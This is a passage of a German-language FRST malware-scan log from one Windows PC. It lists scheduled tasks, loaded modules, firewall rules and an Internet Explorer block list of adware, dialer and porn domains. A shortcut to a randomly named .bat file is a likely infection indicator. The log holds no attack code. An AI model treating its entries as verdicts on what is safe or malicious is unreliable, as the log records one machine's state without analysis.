Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {6277B01E-8C65-4DE6-9712-35ABEBF90E78} - System32\Tasks\StartMenu8_Start => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe [2016-11-05] ()
Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation)
Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A803118B-8018-4040-B0AB-DEBB70589A5F} - System32\Tasks\Driver Booster SkipUAC (*****) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe
Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation)
Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {B8F24EEC-1F14-4791-AFC9-1BB058D7BAA4} - System32\Tasks\Uninstaller_SkipUac_Martin_Walser => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\StartMenu8_Start.job => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe
Task: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_Walser.job => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe
Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_Walser.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2014-09-19 17:15 - 2014-09-19 17:15 - 000330240 _____ () C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe
2012-09-13 00:38 - 2012-09-13 00:38 - 000264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000878592 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\platforms\qwindows.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000036352 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qgenericbearer.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000038912 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qnativerwifibearer.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000032256 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qdds.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qgif.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000027648 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qicns.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qico.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000381952 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjp2.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000204800 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjpeg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000218112 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qmng.dll
2014-09-11 17:08 - 2014-09-11 17:08 - 000015872 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qsvg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000015360 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtga.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000307712 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtiff.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000014848 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwbmp.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000252928 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwebp.dll
2017-06-01 23:04 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\SDL2.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 002497824 _____ () G:\Program Files (x86)\Steam\video.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 004969248 _____ () G:\Program Files (x86)\Steam\v8.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000491008 _____ () G:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000332800 _____ () G:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000442880 _____ () G:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 002549760 _____ () G:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000485888 _____ () G:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001195296 _____ () G:\Program Files (x86)\Steam\icuuc.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001563936 _____ () G:\Program Files (x86)\Steam\icui18n.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000884512 _____ () G:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-18 00:47 - 2016-07-05 00:17 - 000266560 _____ () G:\Program Files (x86)\Steam\openvr_api.dll
2016-04-09 00:35 - 2016-04-09 00:35 - 003481600 _____ () C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\gpuploader_i18n.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 002144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 007955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 000336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2017-06-08 20:06 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-12 19:34 - 2017-07-06 19:58 - 073088800 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000384288 _____ () G:\Program Files (x86)\Steam\steam.dll
2017-01-29 16:41 - 2017-07-26 19:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000355616 _____ () C:\Program Files (x86)\IObit\Classic Start\madExcept_.bpl
2017-03-11 14:34 - 2015-12-29 12:29 - 000190240 _____ () C:\Program Files (x86)\IObit\Classic Start\madBasic_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000057632 _____ () C:\Program Files (x86)\IObit\Classic Start\madDisAsm_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000059680 _____ () C:\Program Files (x86)\IObit\Classic Start\parseAuto.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000275576 _____ () C:\Program Files (x86)\IObit\Classic Start\sqlite3.dll
2017-03-11 14:34 - 2015-12-29 12:31 - 000047904 _____ () C:\Program Files (x86)\IObit\Classic Start\winkey.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 067725936 _____ () C:\Users\*****\AppData\Roaming\Spotify\libcef.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000110192 _____ () C:\Users\*****\AppData\Roaming\Spotify\SpotifyWinRT.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 001929840 _____ () C:\Users\*****\AppData\Roaming\Spotify\libglesv2.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000087152 _____ () C:\Users\*****\AppData\Roaming\Spotify\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100sexlinks.com -> 100sexlinks.com

Da befinden sich 4789 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk"
HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk"
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
